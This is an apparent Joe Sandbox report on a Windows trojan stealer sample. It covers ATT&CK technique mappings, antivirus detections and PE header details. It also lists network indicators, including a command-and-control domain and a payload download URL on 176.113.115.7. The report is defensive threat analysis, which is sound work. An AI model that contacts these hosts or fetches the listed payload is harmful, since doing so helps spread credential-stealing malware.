    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeDirectory queried: C:\Users\user\Documents\ZIPXYXWIOYJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeDirectory queried: C:\Users\user\Documents\ZIPXYXWIOYJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeDirectory queried: C:\Users\user\DocumentsJump to behavior

    Remote Access Functionality

    barindex
    Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
    Windows Management Instrumentation
    1
    DLL Side-Loading
    1
    Process Injection
    44
    Virtualization/Sandbox Evasion
    2
    OS Credential Dumping
    851
    Security Software Discovery
    Remote Services1
    Archive Collected Data
    11
    Encrypted Channel
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault Accounts2
    Command and Scripting Interpreter
    Boot or Logon Initialization Scripts1
    DLL Side-Loading
    1
    Process Injection
    LSASS Memory44
    Virtualization/Sandbox Evasion
    Remote Desktop Protocol31
    Data from Local System
    2
    Non-Application Layer Protocol
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)2
    Obfuscated Files or Information
    Security Account Manager2
    Process Discovery
    SMB/Windows Admin SharesData from Network Shared Drive13
    Application Layer Protocol
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
    Software Packing
    NTDS1
    File and Directory Discovery
    Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
    DLL Side-Loading
    LSA Secrets223
    System Information Discovery
    SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1647734 Sample: Qyk8RJnGN7.exe Startdate: 25/03/2025 Architecture: WINDOWS Score: 100 10 wxayfarer.live 2->10 16 Antivirus detection for URL or domain 2->16 18 Antivirus / Scanner detection for submitted sample 2->18 20 Multi AV Scanner detection for submitted file 2->20 22 3 other signatures 2->22 6 Qyk8RJnGN7.exe 2->6         started        signatures3 process4 dnsIp5 12 176.113.115.7, 80 SELECTELRU Russian Federation 6->12 14 wxayfarer.live 104.21.112.1, 443, 49681, 49682 CLOUDFLARENETUS United States 6->14 24 Detected unpacking (changes PE section rights) 6->24 26 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 6->26 28 Query firmware table information (likely to detect VMs) 6->28 30 9 other signatures 6->30 signatures6

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    Qyk8RJnGN7.exe70%VirustotalBrowse
    Qyk8RJnGN7.exe69%ReversingLabsWin32.Trojan.Cerbu
    Qyk8RJnGN7.exe100%AviraTR/Crypt.TPM.Gen
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    SourceDetectionScannerLabelLink
    http://176.113.115.7/mine/random.exe:9x0%Avira URL Cloudsafe
    https://wxayfarer.live/ALosnzG100%Avira URL Cloudmalware
    http://176.113.115.7:80/mine/random.exerosoft0%Avira URL Cloudsafe
    https://wxayfarer.live/ALosnzB100%Avira URL Cloudmalware
    http://176.113.115.7/70%Avira URL Cloudsafe
    http://176.113.115.7/mine/random.exeJ0%Avira URL Cloudsafe
    https://wxayfarer.live/F100%Avira URL Cloudmalware
    https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696490019400400000.2&ci=1696490019252.0%Avira URL Cloudsafe
    https://wxayfarer.live/ALosnztAw100%Avira URL Cloudmalware
    https://wxayfarer.live:443/ALosnz100%Avira URL Cloudmalware
    http://176.113.115.7/edX0%Avira URL Cloudsafe
    https://wxayfarer.live/ALosnz%100%Avira URL Cloudmalware
    https://wxayfarer.live:443/ALosnzal100%Avira URL Cloudmalware

    Download Network PCAP: filteredfull

    NameIPActiveMaliciousAntivirus DetectionReputation
    wxayfarer.live
    104.21.112.1
    truefalse
      high
      NameMaliciousAntivirus DetectionReputation
      https://wxayfarer.live/ALosnzfalse
        high
        NameSourceMaliciousAntivirus DetectionReputation
        https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_ef0fa27a12d43fbd45649e195429e8a63ddcad7cf7e128c0Qyk8RJnGN7.exe, 00000000.00000003.960759964.0000000005E54000.00000004.00000800.00020000.00000000.sdmpfalse
          high
          https://duckduckgo.com/ac/?q=Qyk8RJnGN7.exe, 00000000.00000003.929673812.0000000005E0A000.00000004.00000800.00020000.00000000.sdmpfalse
            high
            https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696490019400400000.2&ci=1696490019252.Qyk8RJnGN7.exe, 00000000.00000003.960759964.0000000005E54000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://176.113.115.7:80/mine/random.exerosoftQyk8RJnGN7.exe, 00000000.00000002.1229503900.0000000001483000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Qyk8RJnGN7.exe, 00000000.00000003.929673812.0000000005E0A000.00000004.00000800.00020000.00000000.sdmpfalse
              high
              http://crl.rootca1.amazontrust.com/rootca1.crl0Qyk8RJnGN7.exe, 00000000.00000003.951659804.0000000005DD0000.00000004.00000800.00020000.00000000.sdmpfalse
                high
                https://ac.ecosia.org?q=Qyk8RJnGN7.exe, 00000000.00000003.929673812.0000000005E0A000.00000004.00000800.00020000.00000000.sdmpfalse
                  high
                  http://176.113.115.7/mine/random.exeQyk8RJnGN7.exe, 00000000.00000002.1229655461.00000000014F2000.00000004.00000020.00020000.00000000.sdmp, Qyk8RJnGN7.exe, 00000000.00000002.1229655461.0000000001509000.00000004.00000020.00020000.00000000.sdmpfalse
                    high
                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=Qyk8RJnGN7.exe, 00000000.00000003.929673812.0000000005E0A000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      http://ocsp.rootca1.amazontrust.com0:Qyk8RJnGN7.exe, 00000000.00000003.951659804.0000000005DD0000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        https://wxayfarer.live/ALosnzGQyk8RJnGN7.exe, 00000000.00000003.999657128.0000000001509000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        unknown
                        https://wxayfarer.live/Qyk8RJnGN7.exe, Qyk8RJnGN7.exe, 00000000.00000002.1229655461.00000000014F2000.00000004.00000020.00020000.00000000.sdmp, Qyk8RJnGN7.exe, 00000000.00000003.980354207.00000000014F2000.00000004.00000020.00020000.00000000.sdmp, Qyk8RJnGN7.exe, 00000000.00000003.924127439.0000000001483000.00000004.00000020.00020000.00000000.sdmp, Qyk8RJnGN7.exe, 00000000.00000003.980607301.00000000014F4000.00000004.00000020.00020000.00000000.sdmpfalse
                          high
                          https://wxayfarer.live/ALosnzBQyk8RJnGN7.exe, 00000000.00000003.999657128.0000000001509000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: malware
                          unknown
                          https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brQyk8RJnGN7.exe, 00000000.00000003.952693809.00000000060C3000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            http://176.113.115.7/mine/random.exe:9xQyk8RJnGN7.exe, 00000000.00000002.1229655461.00000000014F2000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://wxayfarer.live/ALosnztAwQyk8RJnGN7.exe, 00000000.00000003.980607301.0000000001509000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: malware
                            unknown
                            https://www.google.com/images/branding/product/ico/googleg_alldp.icoQyk8RJnGN7.exe, 00000000.00000003.929673812.0000000005E0A000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              https://wxayfarer.live/FQyk8RJnGN7.exe, 00000000.00000003.962059232.00000000014F3000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: malware
                              unknown
                              http://176.113.115.7/7Qyk8RJnGN7.exe, 00000000.00000002.1229655461.00000000014F2000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://www.ecosia.org/newtab/v20Qyk8RJnGN7.exe, 00000000.00000003.929673812.0000000005E0A000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgQyk8RJnGN7.exe, 00000000.00000003.960759964.0000000005E54000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://176.113.115.7/mine/random.exeJQyk8RJnGN7.exe, 00000000.00000002.1229655461.00000000014A7000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://x1.c.lencr.org/0Qyk8RJnGN7.exe, 00000000.00000003.951659804.0000000005DD0000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://x1.i.lencr.org/0Qyk8RJnGN7.exe, 00000000.00000003.951659804.0000000005DD0000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://duckduckgo.com/chrome_newtabv20Qyk8RJnGN7.exe, 00000000.00000003.929673812.0000000005E0A000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchQyk8RJnGN7.exe, 00000000.00000003.929673812.0000000005E0A000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://wxayfarer.live:443/ALosnzQyk8RJnGN7.exe, Qyk8RJnGN7.exe, 00000000.00000003.924127439.0000000001483000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: malware
                                          unknown
                                          http://crt.rootca1.amazontrust.com/rootca1.cer0?Qyk8RJnGN7.exe, 00000000.00000003.951659804.0000000005DD0000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&uQyk8RJnGN7.exe, 00000000.00000003.960759964.0000000005E54000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqWfpl%2B4pbW4pbWfpbW7ReNxR3UIG8zInwYIFIVs9eQyk8RJnGN7.exe, 00000000.00000003.960759964.0000000005E54000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpgQyk8RJnGN7.exe, 00000000.00000003.960759964.0000000005E54000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://176.113.115.7/edXQyk8RJnGN7.exe, 00000000.00000002.1229655461.00000000014F2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://wxayfarer.live/ALosnz%Qyk8RJnGN7.exe, 00000000.00000003.999657128.0000000001509000.00000004.00000020.00020000.00000000.sdmp, Qyk8RJnGN7.exe, 00000000.00000002.1229655461.0000000001509000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: malware
                                                  unknown
                                                  https://support.mozilla.org/products/firefoxgro.allQyk8RJnGN7.exe, 00000000.00000003.952693809.00000000060C3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=Qyk8RJnGN7.exe, 00000000.00000003.929673812.0000000005E0A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://wxayfarer.live:443/ALosnzalQyk8RJnGN7.exe, 00000000.00000003.980354207.0000000001483000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: malware
                                                      unknown
                                                      https://gemini.google.com/app?q=Qyk8RJnGN7.exe, 00000000.00000003.929673812.0000000005E0A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://176.113.115.7/Qyk8RJnGN7.exe, 00000000.00000002.1229655461.00000000014F2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696490019400400000.1&ci=1696490019252.12791&ctaQyk8RJnGN7.exe, 00000000.00000003.960759964.0000000005E54000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            • No. of IPs < 25%
                                                            • 25% < No. of IPs < 50%
                                                            • 50% < No. of IPs < 75%
                                                            • 75% < No. of IPs
                                                            IPDomainCountryFlagASNASN NameMalicious
                                                            104.21.112.1
                                                            wxayfarer.liveUnited States
                                                            13335CLOUDFLARENETUSfalse
                                                            176.113.115.7
                                                            unknownRussian Federation
                                                            49505SELECTELRUfalse
                                                            Joe Sandbox version:42.0.0 Malachite
                                                            Analysis ID:1647734
                                                            Start date and time:2025-03-25 08:15:42 +01:00
                                                            Joe Sandbox product:CloudBasic
                                                            Overall analysis duration:0h 5m 46s
                                                            Hypervisor based Inspection enabled:false
                                                            Report type:full
                                                            Cookbook file name:default.jbs
                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                            Number of analysed new started processes analysed:11
                                                            Number of new started drivers analysed:0
                                                            Number of existing processes analysed:0
                                                            Number of existing drivers analysed:0
                                                            Number of injected processes analysed:0
                                                            Technologies:
                                                            • HCA enabled
                                                            • EGA enabled
                                                            • AMSI enabled
                                                            Analysis Mode:default
                                                            Analysis stop reason:Timeout
                                                            Sample name:Qyk8RJnGN7.exe
                                                            renamed because original name is a hash value
                                                            Original Sample Name:880af66f46621859f8330e966419e8cf.exe
                                                            Detection:MAL
                                                            Classification:mal100.troj.spyw.evad.winEXE@1/0@1/2
                                                            EGA Information:Failed
                                                            HCA Information:
                                                            • Successful, ratio: 100%
                                                            • Number of executed functions: 0
                                                            • Number of non-executed functions: 2
                                                            Cookbook Comments:
                                                            • Found application associated with file extension: .exe
                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, sppsvc.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                            • Excluded IPs from analysis (whitelisted): 4.175.87.197, 184.31.69.3
                                                            • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, c.pki.goog, fe3cr.delivery.mp.microsoft.com
                                                            • Execution Graph export aborted for target Qyk8RJnGN7.exe, PID 6940 because there are no executed function
                                                            • Not all processes where analyzed, report is missing behavior information
                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                            TimeTypeDescription
                                                            03:16:40API Interceptor14x Sleep call for process: Qyk8RJnGN7.exe modified
                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            104.21.112.1P.O.exeGet hashmaliciousFormBookBrowse
                                                            • www.auto-total.info/bt6e/
                                                            BVEWWBCB.msiGet hashmaliciousUnknownBrowse
                                                            • speed-cloud-soft.rest/c
                                                            #$43557.exeGet hashmaliciousFormBookBrowse
                                                            • www.nolae-eu.shop/11jg/
                                                            BID_TERMS.EXE.exeGet hashmaliciousFormBookBrowse
                                                            • www.meshki-co-uk.shop/mzlg/
                                                            SfF8tFQ11f.exeGet hashmaliciousUnknownBrowse
                                                            • cpvnxker.xyz/headimage.jpg
                                                            Urgent Purchase Order.vbeGet hashmaliciousFormBookBrowse
                                                            • www.rbopisalive.cyou/6m32/
                                                            CQDNwLUdY4.exeGet hashmaliciousFormBookBrowse
                                                            • www.rbopisalive.cyou/2dxw/
                                                            sY8Sfsplzf.exeGet hashmaliciousFormBookBrowse
                                                            • www.enoughmoney.online/z9gb/?TF-P7=zR3cIyonFbUCfX4wpKNWKHtg5/zg1+YcnXRNJ+yYPjA6661hsBw23FkDfEgtp7rlWUxdaFu+U4x0i75BG7d41DR1Eot6cYC6DrNKmQYa+SmymwWTrA==&Pv5=thT0rvC
                                                            gbdXRnNKkm.exeGet hashmaliciousFormBookBrowse
                                                            • www.rbopisalive.cyou/a669/
                                                            JOB NO. AIQ8478.bat.exeGet hashmaliciousLokibotBrowse
                                                            • touxzw.ir/sccc/five/fre.php
                                                            176.113.115.7random.exeGet hashmaliciousAmadey, LummaC StealerBrowse
                                                            • 176.113.115.7/mine/random.exe
                                                            6xdW3oRY63.exeGet hashmaliciousAmadey, DarkVision Rat, LummaC Stealer, VidarBrowse
                                                            • 176.113.115.7/mine/random.exe
                                                            work.jsGet hashmaliciousAmadey, LummaC Stealer, PureLog Stealer, Stealc, VidarBrowse
                                                            • 176.113.115.7/files/unique2/random.exe
                                                            random.exeGet hashmaliciousAmadey, LummaC Stealer, Stealc, XmrigBrowse
                                                            • 176.113.115.7/files/crazytimeya/random.exe
                                                            random.exeGet hashmaliciousAmadeyBrowse
                                                            • 176.113.115.7/files/qqdoup/random.exe
                                                            VSAXXKuhCu.exeGet hashmaliciousAmadey, AsyncRATBrowse
                                                            • 176.113.115.7/files/unique2/random.exe
                                                            L0erlgyZ6f.exeGet hashmaliciousAmadey, LummaC StealerBrowse
                                                            • 176.113.115.7/files/qqdoup/random.exe
                                                            13s1HMkHKv.exeGet hashmaliciousAmadey, DarkVision Rat, Fallen Miner, LummaC StealerBrowse
                                                            • 176.113.115.7/files/2043702969/dx3hXS1.exe
                                                            wJWNpO6lcm.exeGet hashmaliciousAmadey, GCleaner, LummaC StealerBrowse
                                                            • 176.113.115.7/files/unique2/random.exe
                                                            download.php.exe.bin.exeGet hashmaliciousAmadey, DCRat, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                            • 176.113.115.7/mine/random.exe
                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            wxayfarer.live9GNLDc2CHH.exeGet hashmaliciousLummaC StealerBrowse
                                                            • 104.21.80.1
                                                            jx22fssg2d.exeGet hashmaliciousLummaC StealerBrowse
                                                            • 104.21.16.1
                                                            EUsF26UAMM.exeGet hashmaliciousLummaC StealerBrowse
                                                            • 104.21.16.1
                                                            ZqkKpwG.exeGet hashmaliciousUnknownBrowse
                                                            • 104.21.16.1
                                                            random(3).exeGet hashmaliciousLummaC StealerBrowse
                                                            • 104.21.96.1
                                                            random(9).exeGet hashmaliciousAmadey, CryptOne, LummaC Stealer, Socks5SystemzBrowse
                                                            • 104.21.64.1
                                                            ZqkKpwG.exeGet hashmaliciousUnknownBrowse
                                                            • 104.21.16.1
                                                            random.exe1.exeGet hashmaliciousLummaC StealerBrowse
                                                            • 104.21.32.1
                                                            random.exeGet hashmaliciousAmadey, LummaC StealerBrowse
                                                            • 104.21.112.1
                                                            Kr9UTz2.exeGet hashmaliciousLummaC StealerBrowse
                                                            • 104.21.48.1
                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            SELECTELRUnrKr2roAsG.exeGet hashmaliciousAmadeyBrowse
                                                            • 176.113.115.6
                                                            9GNLDc2CHH.exeGet hashmaliciousLummaC StealerBrowse
                                                            • 176.113.115.7
                                                            jx22fssg2d.exeGet hashmaliciousLummaC StealerBrowse
                                                            • 176.113.115.7
                                                            EUsF26UAMM.exeGet hashmaliciousLummaC StealerBrowse
                                                            • 176.113.115.7
                                                            JtH26qoxr2.exeGet hashmaliciousAmadeyBrowse
                                                            • 176.113.115.6
                                                            0Q6EWqWu4N.exeGet hashmaliciousAmadeyBrowse
                                                            • 176.113.115.6
                                                            C75q85Awi4.exeGet hashmaliciousAmadeyBrowse
                                                            • 176.113.115.6
                                                            5yCKVE324w.exeGet hashmaliciousAmadeyBrowse
                                                            • 176.113.115.6
                                                            6nsLmbufDq.exeGet hashmaliciousAmadeyBrowse
                                                            • 176.113.115.6
                                                            jZcih8RI7e.exeGet hashmaliciousAmadeyBrowse
                                                            • 176.113.115.6
                                                            CLOUDFLARENETUSNew Purchase Order.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • 104.21.96.1
                                                            h2H2R15NDO.exeGet hashmaliciousLummaC StealerBrowse
                                                            • 104.21.72.121
                                                            project.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 104.21.16.1
                                                            m3gyyctL5A.exeGet hashmaliciousLummaC StealerBrowse
                                                            • 172.67.183.183
                                                            bettercontactforgreatworksgoodforbetter.htaGet hashmaliciousCobalt Strike, FormBookBrowse
                                                            • 104.21.32.1
                                                            Globalmaging documents 1202692293.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 104.21.16.1
                                                            DHL - OVERDUE - REMINDER - 1302115347.exeGet hashmaliciousFormBookBrowse
                                                            • 104.21.9.169
                                                            awb_fedex_documents_delivery_25_03_2025_0000000000000_doc.batGet hashmaliciousGuLoaderBrowse
                                                            • 172.67.213.163
                                                            20250325252508951.vbsGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                            • 104.21.72.118
                                                            HSBC Payment Advice.pdf.exeGet hashmaliciousCryptOne, Snake Keylogger, VIP KeyloggerBrowse
                                                            • 104.21.80.1
                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            a0e9f5d64349fb13191bc781f81f42e1h2H2R15NDO.exeGet hashmaliciousLummaC StealerBrowse
                                                            • 104.21.112.1
                                                            m3gyyctL5A.exeGet hashmaliciousLummaC StealerBrowse
                                                            • 104.21.112.1
                                                            PO#45028.xlam.xlsxGet hashmaliciousUnknownBrowse
                                                            • 104.21.112.1
                                                            Nuevo comando_BR WJO-3-24-2025.xlam.xlsxGet hashmaliciousUnknownBrowse
                                                            • 104.21.112.1
                                                            PURCHASE ORDER 5172025.xla.xlsxGet hashmaliciousUnknownBrowse
                                                            • 104.21.112.1
                                                            BL 248436935 CNTR MRKU9180226.docx.docGet hashmaliciousUnknownBrowse
                                                            • 104.21.112.1
                                                            PURCHASE ORDER 5172025.xla.xlsxGet hashmaliciousUnknownBrowse
                                                            • 104.21.112.1
                                                            ysxekL7sOS.exeGet hashmaliciousLummaCBrowse
                                                            • 104.21.112.1
                                                            SecuriteInfo.com.Other.Malware-gen.24773.2907.xlsxGet hashmaliciousUnknownBrowse
                                                            • 104.21.112.1
                                                            SecuriteInfo.com.Other.Malware-gen.24773.2907.xlsxGet hashmaliciousUnknownBrowse
                                                            • 104.21.112.1
                                                            No context
                                                            No created / dropped files found
                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                            Entropy (8bit):6.57427552688049
                                                            TrID:
                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                            • DOS Executable Generic (2002/1) 0.02%
                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                            File name:Qyk8RJnGN7.exe
                                                            File size:2'930'176 bytes
                                                            MD5:880af66f46621859f8330e966419e8cf
                                                            SHA1:ce5975e4ecf122b6463f0468e27511fa0ec3f497
                                                            SHA256:fe9333e5bbe2789f4ac7c4f7d084baf1e4d38d53c3f11ca56116cc6f6dfc9382
                                                            SHA512:c81f48d408159aa69f52935adddec4c9c563f702bab5f7ea8a50f9157f7c821aaaca48a4f62801a2a7cf438ffc1da478c1226d95cbf15d54cbc09b849867b757
                                                            SSDEEP:49152:juk/CnqdzOriSq1G9u2mRNdy+x6LdNiO8H+2QvYyj6A3VA1QyJz:6k/CqZOriS+GxmRNdyU0H8H+29ymA+v
                                                            TLSH:BED55A62B829B2CFE4CA23795527CD826E5D07B9471448C3983D68BE7DB7CC035B6D28
                                                            File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....T.g............................../...........@...........................0......X-...@.................................W...k..
                                                            Icon Hash:90cececece8e8eb0
                                                            Entrypoint:0x6fe000
                                                            Entrypoint Section:.taggant
                                                            Digitally signed:false
                                                            Imagebase:0x400000
                                                            Subsystem:windows gui
                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                            DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                            Time Stamp:0x67E154E2 [Mon Mar 24 12:49:38 2025 UTC]
                                                            TLS Callbacks:
                                                            CLR (.Net) Version:
                                                            OS Version Major:6
                                                            OS Version Minor:0
                                                            File Version Major:6
                                                            File Version Minor:0
                                                            Subsystem Version Major:6
                                                            Subsystem Version Minor:0
                                                            Import Hash:2eabe9054cad5152567f0699947a2c5b
                                                            Instruction
                                                            jmp 00007F0BACEE9F4Ah
                                                            sete byte ptr [eax+eax]
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            jmp 00007F0BACEEBF45h
                                                            add byte ptr [edx+ecx], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            xor byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            sbb al, 00h
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add al, 0Ah
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            pop es
                                                            add byte ptr [eax], 00000000h
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            adc byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add ecx, dword ptr [edx]
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            NameVirtual AddressVirtual Size Is in Section
                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x610570x6b.idata
                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x600000x300.rsrc
                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x611f80x8.idata
                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
